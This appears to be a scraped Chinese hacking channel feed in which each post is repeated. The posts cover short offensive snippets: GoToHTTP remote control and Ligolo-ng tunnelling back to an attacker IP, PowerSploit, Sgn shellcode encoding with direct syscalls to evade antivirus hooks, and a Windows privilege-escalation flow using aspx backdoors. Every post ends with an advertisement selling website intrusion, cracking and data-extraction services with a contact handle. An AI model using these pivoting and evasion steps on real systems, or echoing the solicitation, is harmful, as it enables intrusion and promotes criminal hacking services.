在 Kali Linux 中,可以通过在应用程序菜单中单击“应用程序”>“信息收集”>“maltegoce”来启动 Maltego
单击“显示应用程序”菜单可以执行相同的操作
也可以通过打开终端并输入来启动 Maltego maltegoce,但由于它不是命令行工具,所以这不是最好的选择。
在启动时,所有模块都正确加载后,我们会收到启动向导提示,要求输入 Maltego 帐户凭据
插入它们并正确解决了验证码,您将收到一条欢迎消息和有关 API 密钥有效性的信息。在下一个提示中,只需保留“从 Maltego 公共服务器安装转换”,它将在客户端上安装转换。
正确的初始化消息,其中包含开始使用 Maltego 的不同可能性.
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
单击“显示应用程序”菜单可以执行相同的操作
也可以通过打开终端并输入来启动 Maltego maltegoce,但由于它不是命令行工具,所以这不是最好的选择。
在启动时,所有模块都正确加载后,我们会收到启动向导提示,要求输入 Maltego 帐户凭据
插入它们并正确解决了验证码,您将收到一条欢迎消息和有关 API 密钥有效性的信息。在下一个提示中,只需保留“从 Maltego 公共服务器安装转换”,它将在客户端上安装转换。
正确的初始化消息,其中包含开始使用 Maltego 的不同可能性.
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
👍1
GoToHTTP
B2C模式,无需安装控制端软件,有浏览器就可以远控。
流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
在低带宽也可以使用,运行占用内存极低,控制时占用CPU仅为0%-3%。
被控端在类Linux系统上支持图形界面(GUI)和字符界面(CLI)。
将gotohttp_x64.exe上传到指定目录。选中点击执行,在靶机里直接弹出连接框。
读取配置文件,可以获取电脑ID和控制码。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
B2C模式,无需安装控制端软件,有浏览器就可以远控。
流量走https协议,只要目标放行443端口出口就可以实现内网穿透。
在低带宽也可以使用,运行占用内存极低,控制时占用CPU仅为0%-3%。
被控端在类Linux系统上支持图形界面(GUI)和字符界面(CLI)。
将gotohttp_x64.exe上传到指定目录。选中点击执行,在靶机里直接弹出连接框。
读取配置文件,可以获取电脑ID和控制码。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
❤1
代理设置
启动代理很简单。只需从保存代理的文件夹启动即可。如果您使用的是 Linux,请使用 chmod +x 命令确保其可执行。然后,要启动代理并将其连接到 Ligolo-ng 代理,请运行以下命令:
./agent -connect <Attack IP>:11601 -ignore-cert
在此命令中,将 <Attack_IP> 替换为运行 Ligolo-ng 代理的 Kali 计算机的 IP 地址。我们使用 -ignore-cert 标志,因为此演示是在隔离实验室中进行的,因此我们在代理中使用了自签名证书。
代理加入后,您将在代理屏幕上看到确认消息。
该消息表明代理正在用户名为 Ubuntu、主机名为 Ubuntu-virtual-machine 的计算机上运行。它还显示了代理计算机的 IP 地址以及连接到代理服务器的端口号。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
启动代理很简单。只需从保存代理的文件夹启动即可。如果您使用的是 Linux,请使用 chmod +x 命令确保其可执行。然后,要启动代理并将其连接到 Ligolo-ng 代理,请运行以下命令:
./agent -connect <Attack IP>:11601 -ignore-cert
在此命令中,将 <Attack_IP> 替换为运行 Ligolo-ng 代理的 Kali 计算机的 IP 地址。我们使用 -ignore-cert 标志,因为此演示是在隔离实验室中进行的,因此我们在代理中使用了自签名证书。
代理加入后,您将在代理屏幕上看到确认消息。
该消息表明代理正在用户名为 Ubuntu、主机名为 Ubuntu-virtual-machine 的计算机上运行。它还显示了代理计算机的 IP 地址以及连接到代理服务器的端口号。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
识别哈希
如果您遇到哈希并且不确定使用了什么哈希算法,一些工具可以帮助您识别它们,例如 Hash-Identifer 或 hashID。
hashID 取代了 Hash-Identifier,尽管它仍然可以使用并且在 Kali 上默认安装。
可以使用以下命令从命令行安装 hashID。
pip install hashid
安装完成后,只需输入hashid -m需要识别的哈希值,如下所示。这将显示相应的 Hashcat 模式以及潜在的哈希值。让我们将以下哈希值放入 hashID 中。
7eb126739275d3717e981a78311dbdf6f71b7a74
该哈希被识别为 SHA-1 哈希。
这些工具尽力猜测正确的哈希值,但可能无法准确识别您输入的所有哈希值。了解您正在使用的技术将有助于您确定所使用的哈希值。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
如果您遇到哈希并且不确定使用了什么哈希算法,一些工具可以帮助您识别它们,例如 Hash-Identifer 或 hashID。
hashID 取代了 Hash-Identifier,尽管它仍然可以使用并且在 Kali 上默认安装。
可以使用以下命令从命令行安装 hashID。
pip install hashid
安装完成后,只需输入hashid -m需要识别的哈希值,如下所示。这将显示相应的 Hashcat 模式以及潜在的哈希值。让我们将以下哈希值放入 hashID 中。
7eb126739275d3717e981a78311dbdf6f71b7a74
该哈希被识别为 SHA-1 哈希。
这些工具尽力猜测正确的哈希值,但可能无法准确识别您输入的所有哈希值。了解您正在使用的技术将有助于您确定所使用的哈希值。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
👍1
安装 PowerSploit
在Kali Linux的最新版本中,所有 PowerSploit cmdlet 都默认安装在该/usr/share/windows-resources/powersploit 目录下。
您还可以运行 alias 命令powersploit 列出该目录并从终端切换到该目录。
使用 PowerSploit 模块
PowerSploit 有两类模块:一类是在攻击机器上本地运行的模块,另一类是在初始访问的目标系统上运行的模块。让我们看看如何使用这两种类型的模块。
本地运行模块
在攻击机器上本地运行的 PowerSploit 模块包括“侦察”和“脚本修改”。这两个模块包含使用 PowerShell 向目标系统发送网络数据包或编辑脚本内容的 cmdlet。
您必须将默认的 ZSH 终端更改为 PowerShell 终端才能使用它们。在 Kali 中,单击左上角菜单上的“应用程序”图标,然后搜索“PowerShell”。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
在Kali Linux的最新版本中,所有 PowerSploit cmdlet 都默认安装在该/usr/share/windows-resources/powersploit 目录下。
您还可以运行 alias 命令powersploit 列出该目录并从终端切换到该目录。
使用 PowerSploit 模块
PowerSploit 有两类模块:一类是在攻击机器上本地运行的模块,另一类是在初始访问的目标系统上运行的模块。让我们看看如何使用这两种类型的模块。
本地运行模块
在攻击机器上本地运行的 PowerSploit 模块包括“侦察”和“脚本修改”。这两个模块包含使用 PowerShell 向目标系统发送网络数据包或编辑脚本内容的 cmdlet。
您必须将默认的 ZSH 终端更改为 PowerShell 终端才能使用它们。在 Kali 中,单击左上角菜单上的“应用程序”图标,然后搜索“PowerShell”。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
开发病毒、木马、和其他恶意软件,或者是创建和使用各种自动化脚本进行攻击或防御。
黑客需要深厚的编程知识来理解和挖掘软件、硬件或网络系统中的漏洞,进而利用这些漏洞进行攻击或防御。
编程语言既是一种工具也是一种武器,黑客通过精通一种或多种编程语言来提高其技能水平,能够更加精准和高效地达到其目的。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
黑客需要深厚的编程知识来理解和挖掘软件、硬件或网络系统中的漏洞,进而利用这些漏洞进行攻击或防御。
编程语言既是一种工具也是一种武器,黑客通过精通一种或多种编程语言来提高其技能水平,能够更加精准和高效地达到其目的。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
自解密的shellcode
这里使用了Sgn工具,它会帮我们处理shellcode实现运行时候自解密
./sgn --arch=64 -S -i shellcode.txt
-S是代表安全生成shellcode, -i指定我们要处理的shellcode文件,--arch=64代表指定处理64位的
Windows API通过系统调用
我们用Windbg打个断点到VirutalAlloc这边,跟进去来看看正常API调用的流程,注意堆栈调用和反汇编区域
右下方是正常windows api调用的一个正常路径,最下方这两个是线程启动正常的调用
07 00000054`5532fa40 00007ff8`9a76af38 KERNEL32!BaseThreadInitThunk+0x1d
08 00000054`5532fa70 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Syscall就是要跳过KERNELBASE!VirtualAlloc+0x48这一步,直接或者间接发起Syscall,达到绕过hook在KERNELBASE的杀毒
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
这里使用了Sgn工具,它会帮我们处理shellcode实现运行时候自解密
./sgn --arch=64 -S -i shellcode.txt
-S是代表安全生成shellcode, -i指定我们要处理的shellcode文件,--arch=64代表指定处理64位的
Windows API通过系统调用
我们用Windbg打个断点到VirutalAlloc这边,跟进去来看看正常API调用的流程,注意堆栈调用和反汇编区域
右下方是正常windows api调用的一个正常路径,最下方这两个是线程启动正常的调用
07 00000054`5532fa40 00007ff8`9a76af38 KERNEL32!BaseThreadInitThunk+0x1d
08 00000054`5532fa70 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Syscall就是要跳过KERNELBASE!VirtualAlloc+0x48这一步,直接或者间接发起Syscall,达到绕过hook在KERNELBASE的杀毒
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
windows漏洞提权流程
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限
执行命令的时候 aspx->php和asp
如果管理员删除服务器组件 wscript.shell 无法在asp执行cmd命令 这个时候可以使用aspx的后门查看是否有权限执行cmd命令
选择能利用的COM口,这里的0f87369f-a4e5-4cfc-bd3e-73e6154572dd就是用来操控计划任务的。然后只需要找到对应调用的接口类,声明对应的接口类并调用其中类的里的某个函数。
例如代码里的:ITaskService
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限
执行命令的时候 aspx->php和asp
如果管理员删除服务器组件 wscript.shell 无法在asp执行cmd命令 这个时候可以使用aspx的后门查看是否有权限执行cmd命令
选择能利用的COM口,这里的0f87369f-a4e5-4cfc-bd3e-73e6154572dd就是用来操控计划任务的。然后只需要找到对应调用的接口类,声明对应的接口类并调用其中类的里的某个函数。
例如代码里的:ITaskService
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke